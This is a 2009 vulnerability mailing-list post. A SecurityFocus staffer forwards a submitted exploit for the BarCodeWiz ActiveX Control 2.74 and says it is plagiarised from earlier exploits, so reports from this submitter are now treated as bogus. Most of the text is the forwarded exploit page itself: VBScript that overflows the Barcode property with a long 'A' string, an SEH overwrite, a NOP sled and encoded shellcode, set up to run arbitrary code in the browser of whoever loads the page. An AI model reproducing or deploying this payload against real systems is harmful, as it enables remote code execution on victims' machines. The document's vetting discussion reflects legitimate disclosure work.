[VIM] [Fwd: new bug | BarCodeWiz Barcode ActiveX Control 2.74 (BarcodeWiz.dll) SEH Overwrite]
Rob Keith
rkeith at securityfocus.com
Mon Mar 16 18:37:02 UTC 2009
Hey,
Seen a few exploits from 'Faryad Rahmany' from a number of different email addresses in the last
month or so. Most if not all of which, including this one, look to be ripoffs from other people's
exploits (BID 23891: http://downloads.securityfocus.com/vulnerabilities/exploits/23891-Parveen.html,
www.milw0rm.com/exploits/download/3882). In this case, the only change is the method being called,
the length of 'A's, and of course the credit.
Anyways, we've started treating anything from this reporter as bogus reports. If anyone else has
further insights, please pass them along.
Thanks,
Rob
-------- Original Message --------
Subject: new bug | BarCodeWiz Barcode ActiveX Control 2.74
(BarcodeWiz.dll) SEH Overwrite
Date: Mon, 16 Mar 2009 11:04:11 -0700 (PDT)
From: Mr.YaHoO <y4ho0_emperor at yahoo.com>
To: vuldb at securityfocus.com
CC: str0ke at milw0rm.com, secalert at securityreason.com
--------------------------------------------------------------------------------------------------------------------------------
\\\|///
\\ - - // Y! Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
This Bug Discover By Ciph3r
Email: Ciph3r_blackhat at yahoo.com
Author : Faryad Rahmany
HomePage : http://Attacker.ir & http://2600.ir & http://rahmany.net
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
----------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6" > </OBJECT>
<script language="vbscript">
shellcode = shellcode + unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49")
shellcode = shellcode + unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode = shellcode + unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34")
shellcode = shellcode + unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode = shellcode + unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54")
shellcode = shellcode + unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37")
shellcode = shellcode + unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48")
shellcode = shellcode + unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38")
shellcode = shellcode + unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c")
shellcode = shellcode + unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e")
shellcode = shellcode + unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48")
shellcode = shellcode + unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54")
shellcode = shellcode + unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38")
shellcode = shellcode + unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43")
shellcode = shellcode + unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37")
shellcode = shellcode + unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a")
shellcode = shellcode + unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b")
shellcode = shellcode + unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33")
shellcode = shellcode + unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57")
shellcode = shellcode + unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49")
shellcode = shellcode + unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36")
shellcode = shellcode + unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")
pointer_seh=unescape("%eb%06%90%90")
seh_handler=unescape("%a9%11%02%75")
targetFile = "C:\Program Files\BarCodeWiz ActiveX Demo\DLL\BarcodeWiz.dll"
prototype = "Property Let Barcode As String"
memberName = "Barcode"
progid = "BARCODEWIZLib.BarCodeWiz"
argCount = 1
arg1=String(13332, "A")
arg1=arg1+pointer_seh+seh_handler+nop+shellcode+nop
target.Barcode arg1
</script>
</body>
</html>